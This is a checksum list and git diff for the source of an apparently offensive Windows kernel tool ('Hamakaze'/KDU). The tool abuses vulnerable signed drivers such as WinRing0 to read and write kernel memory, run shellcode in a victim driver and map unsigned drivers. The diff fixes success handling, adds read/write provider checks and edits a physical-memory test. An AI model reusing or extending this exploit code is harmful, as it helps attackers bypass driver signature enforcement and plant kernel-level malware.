a4fa97b9f2be414bc49881450d5935d2b48c1029d3bee655cd6e77e645327d74 *Source\Hamakaze\diag.h -4894e61226774096e0923164898f314e3ff203d34344df35b936b18f3663e3e7 *Source\Hamakaze\drvmap.cpp +7b15ce1e8654f24a9ac70fdae618fe6c96684bf8462e27d2835da617a51f3308 *Source\Hamakaze\drvmap.cpp c62c75c00882d816856f56005eec67a82cf56179d2a4629c4c8bf53707c16c25 *Source\Hamakaze\drvmap.h 46a4fd4dacc53b917a0894542c786c5db08ac662157438447fa89f71afa615c5 *Source\Hamakaze\dsefix.cpp 5131aa81ffb17238a092b313a954a6d9e9203636ba47562f0a7f8d4daf306221 *Source\Hamakaze\dsefix.h @@ -37,7 +37,7 @@ ea0d8d42a5e7d7fb908c52351f99c69f2019c105d07a1f536756691ab2a74174 *Source\Hamakaz a62576fdaf4fa1fa3782427c9662c7708af81a81b5703ce8d1a5d3bb4d680bde *Source\Hamakaze\KDU.vcxproj.filters b3272c6ec95065c5d293cd256f6f395d1d7b6b8dcac6e49cb1d96806d563593e *Source\Hamakaze\KDU.vcxproj.user a224b5276d3006e16d8bb6b5ef6c701842678612dbcfafb53a840eb174ecfca2 *Source\Hamakaze\kduplist.h -e4008c31f4e819a8920f932f763ecd01a6510715cf6b391354eea281321afe86 *Source\Hamakaze\kduprov.cpp +4622665b799f0b2a5c77f4dfafc250c4d882fc3105cf9306fc888f678cd8563b *Source\Hamakaze\kduprov.cpp 13a842b3bc62995ab8071ae56df74065d6a1388fcda66884012c6d8addb94055 *Source\Hamakaze\kduprov.h ace87ca919d2502c47d147814808e42b892b38cf9092aa69a3dad5f44da05323 *Source\Hamakaze\main.cpp e1a8de39e2d3d0bae5d9bbe1b18e849f5d070feb1d37f838176ede5a401f35ec *Source\Hamakaze\pagewalk.cpp @@ -52,7 +52,7 @@ c617a2090e51738ba9aadff46c573fcf57caada21219ed673ee0f8998e35a831 *Source\Hamakaz 879eea1c38c0c408e3634d0ed2eeae2b8b21e1040b4b0988ea4d802de0ecd21e *Source\Hamakaze\sig.h 7f97a97deea91390c87c759869e069635be6a329ffc941d53da86cfa0ecf1522 *Source\Hamakaze\sup.cpp a13d8320351de7e0366dc935271be1e53bd0e69fa02f3141de67cbf71e5f3155 *Source\Hamakaze\sup.h -31ca945f51fd2779e827d0c9cd9dfd58f33d532b0bee00d0aa044910ab71e05c *Source\Hamakaze\tests.cpp +69fc5422986ab04061534187cd268026be3eba3f38600a3a7b173ee6314b7549 *Source\Hamakaze\tests.cpp ad77ae168188a9748713ab5f7532447ca50a539fa8ebbec5ac86b273696b028e *Source\Hamakaze\tests.h 8046da85c2f9853496b369fa63fe1b89d47583d5367db4a49edfd9f52426e6d7 *Source\Hamakaze\victim.cpp 5b82accd00d244d77f107a7b8ff0253548a463e642976c36f76e85649e60fe8e *Source\Hamakaze\victim.h @@ -63,7 +63,7 @@ fd5b39e2865e12b9525ebda8fd9e9658b341ead5932d1bcb412a189f81ca42ca *Source\Hamakaz 0b6c69ad498e67907e0c574ab06123aee4ec30c99fa181099ea929a8d820bfc1 *Source\Hamakaze\hde\table64.h 76295f1463903ba5ed48ec7e04bb7c43ec4f0b76f112141aedcdbc6cc3355039 *Source\Hamakaze\idrv\alcpu.cpp 98a21df59cb881c1029a8a6c1ad30c9481075c2e4b1fb43969ee6607816b9c9f *Source\Hamakaze\idrv\alcpu.h -251fc648b3592c5e9b9e6085b5a58786ae0b2690b0cd85d9fc4f8a7c80689b84 *Source\Hamakaze\idrv\asrdrv.cpp +de5286bda6dd23940fb2cc0f0e5d3cd12bad73ffdcf30259bc254047a5f1142f *Source\Hamakaze\idrv\asrdrv.cpp 1c2c5b6a7addf3389a6dee6b11e4a4648d403e9c456008ecefbc79deaa34afae *Source\Hamakaze\idrv\asrdrv.h b1350783a851e6345b880c8a5313e871d2249aa5524f41406c52fa62483f2229 *Source\Hamakaze\idrv\atszio.cpp 015a6aff991174a881650c61fe1b28c5bfe3116a02a32abe5295ff389c5b7099 *Source\Hamakaze\idrv\atszio.h @@ -102,7 +102,7 @@ a0ed8a22c14b35bccd1ff0f45c8b23cad0f8c3af1d8e924caf4bfd63dfb02d89 *Source\Hamakaz 36ec0baeec7b61dbd9936507fcf1bf5aefec08e96ffe3bcb4883785ea2d9a542 *Source\Hamakaze\idrv\rzpnk.h 48cd4fcd61fb5649064726cb7cc42e9977240c11731cf32a4e971eb39ab51b3d *Source\Hamakaze\idrv\winio.cpp d0e354d2f97e993e5e40fb6bb2b99b5bc753beb23f8213d44f99c0309210c1e8 *Source\Hamakaze\idrv\winio.h -57735ccbb0e84b63a6ffc950b2b392125940cee52012bfe0c762c56144e34e2b *Source\Hamakaze\idrv\winring0.cpp +21c357fab30206cb0942e2fbfef6716b2f315d3620827ee32db451a2ebbc3c7d *Source\Hamakaze\idrv\winring0.cpp 103f50efe410f8668c40ddc68051ba49aa0ee1a5301cb54bc42991523c0edae9 *Source\Hamakaze\idrv\winring0.h 524cb55125d1998b60a259ce689164494810979ade21bf5d23e658feeef845f2 *Source\Hamakaze\idrv\zemana.cpp da1ea3c2ceebfdc6e5c338461dc214798870a0d6aa16f7f23c045123fa450f71 *Source\Hamakaze\idrv\zemana.h diff --git a/Source/Hamakaze/drvmap.cpp b/Source/Hamakaze/drvmap.cpp index 4cafb32..a540c5b 100644 --- a/Source/Hamakaze/drvmap.cpp +++ b/Source/Hamakaze/drvmap.cpp @@ -694,15 +694,13 @@ BOOL KDUpMapDriverPhysicalSection( supPrintfEvent(kduEventError, "[!] Shellcode did not trigger the event within two seconds.\r\n"); - bSuccess = FALSE; } else { KDUShowPayloadResult(Context, ScSectionHandle); + bSuccess = TRUE; } - bSuccess = TRUE; - } while (FALSE); // @@ -766,11 +764,11 @@ BOOL KDUpMapDriverPhysicalBruteForce( supPrintfEvent(kduEventError, "[!] Shellcode did not trigger the event within two seconds.\r\n"); - bSuccess = FALSE; } else { KDUShowPayloadResult(Context, ScSectionHandle); + bSuccess = TRUE; } } @@ -778,7 +776,6 @@ BOOL KDUpMapDriverPhysicalBruteForce( supPrintfEvent(kduEventError, "[!] Failed to enumerate physical memory.\r\n"); - bSuccess = FALSE; } // @@ -826,7 +823,6 @@ BOOL KDUpMapDriverDirectVM( supPrintfEvent(kduEventError, "[!] Error writing shellcode to the target driver, abort\r\n"); - bSuccess = FALSE; } else { @@ -846,11 +842,11 @@ BOOL KDUpMapDriverDirectVM( supPrintfEvent(kduEventError, "[!] Shellcode did not trigger the event within two seconds.\r\n"); - bSuccess = FALSE; } else { KDUShowPayloadResult(Context, ScSectionHandle); + bSuccess = TRUE; } } @@ -937,13 +933,11 @@ BOOL KDUMapDriver( printf_s("[+] Query victim loaded driver layout\r\n"); - bSuccess = VpQueryInformation( + if (VpQueryInformation( Context->Victim, VictimDriverInformation, &vdi, - sizeof(vdi)); - - if (bSuccess) + sizeof(vdi))) { targetAddress = vdi.LoadedImageBase + dispatchOffset; diff --git a/Source/Hamakaze/idrv/asrdrv.cpp b/Source/Hamakaze/idrv/asrdrv.cpp index 0750119..8c17a99 100644 --- a/Source/Hamakaze/idrv/asrdrv.cpp +++ b/Source/Hamakaze/idrv/asrdrv.cpp @@ -133,7 +133,7 @@ BOOL AsrEncryptDriverRequest( if (hAlgAes != NULL) BCryptCloseAlgorithmProvider(hAlgAes, 0); - if (bResult && cbResult) { + if (bResult && cbResult && pbCipherData) { ULONG outSize = sizeof(ASRDRV_REQUEST) + cbResult + diff --git a/Source/Hamakaze/idrv/winring0.cpp b/Source/Hamakaze/idrv/winring0.cpp index 0fe28c6..608a4f6 100644 --- a/Source/Hamakaze/idrv/winring0.cpp +++ b/Source/Hamakaze/idrv/winring0.cpp @@ -44,7 +44,7 @@ BOOL WRZeroReadPhysicalMemory( return supCallDriver(DeviceHandle, IOCTL_OLS_READ_MEMORY, &request, - sizeof(request), + sizeof(OLS_READ_MEMORY_INPUT), Buffer, NumberOfBytes); } diff --git a/Source/Hamakaze/kduprov.cpp b/Source/Hamakaze/kduprov.cpp index 74a5ec6..cc2b926 100644 --- a/Source/Hamakaze/kduprov.cpp +++ b/Source/Hamakaze/kduprov.cpp @@ -679,6 +679,25 @@ HINSTANCE KDUProviderLoadDB( return hInstance; } +BOOL KDUpRwHandlersAreSet( + _In_ PVOID ReadHandler, + _In_ PVOID WriteHandler +) +{ + if (ReadHandler == NULL || + WriteHandler == NULL) + { + + supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary kernel read/write or\r\n"\ + "\tKDU interface is not implemented for these methods.\r\n"); + + return FALSE; + + } + + return TRUE; +} + /* * KDUProviderVerifyActionType * @@ -688,11 +707,11 @@ HINSTANCE KDUProviderLoadDB( * */ BOOL KDUProviderVerifyActionType( - _In_ KDU_PROVIDER * Provider, + _In_ KDU_PROVIDER* Provider, _In_ KDU_ACTION_TYPE ActionType) { BOOL bResult = TRUE; - + #ifdef _DEBUG return TRUE; #endif @@ -713,15 +732,33 @@ BOOL KDUProviderVerifyActionType( return FALSE; } - if (Provider->LoadData->PhysMemoryBruteForce && - (Provider->Callbacks.ReadPhysicalMemory == NULL || - Provider->Callbacks.WritePhysicalMemory == NULL)) - { - supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support physical memory read/write or\r\n"\ - "\tKDU interface is not implemented for these methods.\r\n"); - - return FALSE; + if (Provider->LoadData->PreferPhysical || Provider->LoadData->PhysMemoryBruteForce) { + + // + // Driver must have at least something defined. + // + BOOL bFirstTry = TRUE, bSecondTry = TRUE; + + if (Provider->Callbacks.ReadPhysicalMemory == NULL || + Provider->Callbacks.WritePhysicalMemory == NULL) + { + bFirstTry = FALSE; + } + + if (Provider->Callbacks.ReadKernelVM == NULL || + Provider->Callbacks.WriteKernelVM == NULL) + { + bSecondTry = FALSE; + } + + if (bFirstTry == NULL && bSecondTry == NULL) { + supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary kernel read/write or\r\n"\ + "\tKDU interface is not implemented for these methods.\r\n"); + return FALSE; + } + } + break; default: @@ -735,16 +772,28 @@ BOOL KDUProviderVerifyActionType( // // Check if we can read/write. // - if (Provider->Callbacks.ReadKernelVM == NULL || - Provider->Callbacks.WriteKernelVM == NULL) - { - supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary kernel read/write or\r\n"\ - "\tKDU interface is not implemented for these methods.\r\n"); + if (Provider->LoadData->PreferPhysical) { - bResult = FALSE; + if (!KDUpRwHandlersAreSet( + (PVOID)Provider->Callbacks.ReadPhysicalMemory, + (PVOID)Provider->Callbacks.WritePhysicalMemory)) + { + bResult = FALSE; + } + + } + else { + + if (!KDUpRwHandlersAreSet( + (PVOID)Provider->Callbacks.ReadKernelVM, + (PVOID)Provider->Callbacks.WriteKernelVM)) + { + bResult = FALSE; + } } + break; case ActionTypeMapDriver: diff --git a/Source/Hamakaze/tests.cpp b/Source/Hamakaze/tests.cpp index 80d60bd..797a1ab 100644 --- a/Source/Hamakaze/tests.cpp +++ b/Source/Hamakaze/tests.cpp @@ -115,26 +115,37 @@ BOOL WINAPI TestPhysMemEnumCallback( VOID TestBrute(PKDU_CONTEXT Context) { KDU_PHYSMEM_ENUM_PARAMS params; + VICTIM_IMAGE_INFORMATION vi; + HANDLE victimDeviceHandle = NULL; - params.DeviceHandle = Context->DeviceHandle; - params.ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory; - params.WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory; + if (VpCreate(Context->Victim, Context->ModuleBase, &victimDeviceHandle, NULL, NULL)) { - params.DispatchSignature = Context->Victim->Data.DispatchSignature; - params.DispatchSignatureLength = Context->Victim->Data.DispatchSignatureLength; + RtlSecureZeroMemory(&vi, sizeof(vi)); + VpQueryInformation(Context->Victim, VictimImageInformation, &vi, sizeof(vi)); - params.bWrite = FALSE; - params.cbPayload = 0; - params.pvPayload = NULL; - params.ccPagesFound = 0; - params.ccPagesModified = 0; + params.DeviceHandle = Context->DeviceHandle; + params.ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory; + params.WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory; - if (supEnumeratePhysicalMemory(TestPhysMemEnumCallback, ¶ms)) { + params.DispatchSignature = Context->Victim->Data.DispatchSignature; + params.DispatchSignatureLength = Context->Victim->Data.DispatchSignatureLength; - printf_s("[+] Number of pages found: %llu\r\n", params.ccPagesFound); + params.DispatchHandlerOffset = vi.DispatchOffset; + params.DispatchHandlerPageOffset = vi.DispatchPageOffset; + params.JmpAddress = vi.JumpValue; + params.bWrite = FALSE; + params.cbPayload = 0; + params.pvPayload = NULL; + params.ccPagesFound = 0; + params.ccPagesModified = 0; + + if (supEnumeratePhysicalMemory(TestPhysMemEnumCallback, ¶ms)) { + + printf_s("[+] Number of pages found: %llu\r\n", params.ccPagesFound); + + } } - } VOID KDUTest() @@ -146,7 +157,7 @@ VOID KDUTest() RtlSecureZeroMemory(&Buffer, sizeof(Buffer)); - Context = KDUProviderCreate(KDU_PROVIDER_HR_PHYSMEM, + Context = KDUProviderCreate(KDU_PROVIDER_WINRING0, FALSE, NT_WIN7_SP1, KDU_SHELLCODE_V1,